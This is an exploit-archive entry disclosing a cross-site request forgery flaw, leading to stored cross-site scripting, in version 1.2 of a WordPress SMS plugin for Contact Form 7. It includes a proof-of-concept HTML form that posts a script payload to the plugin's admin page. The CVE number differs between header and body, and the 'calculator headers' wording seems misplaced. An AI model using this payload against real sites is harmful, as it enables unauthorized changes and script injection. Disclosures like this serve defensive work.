WordPress International SMS For Contact Form 7 Integration 1.2 CSRF

Related Vulnerabilities: CVE-2022-242721  
Publish Date: 14 Feb 2022
Author: Milad Karimi
                							

                
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross-Site Request Forgery (CSRF)

# Date: 2022-02-09

# Author: Milad Karimi 

# Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/

# Version: 1.2

# Tested on: Windows 11

# CVE: CVE-2022-24272




1. Description:

The plugin International Sms For Contact Form 7 Integration for class-sms-log-display.php and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. 

Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue




2. Proof of Concept:




<form method="post" action="https://example.com/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=">

    <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">

    <input type="submit" value="Save" name="submit">

</form>

            
<p>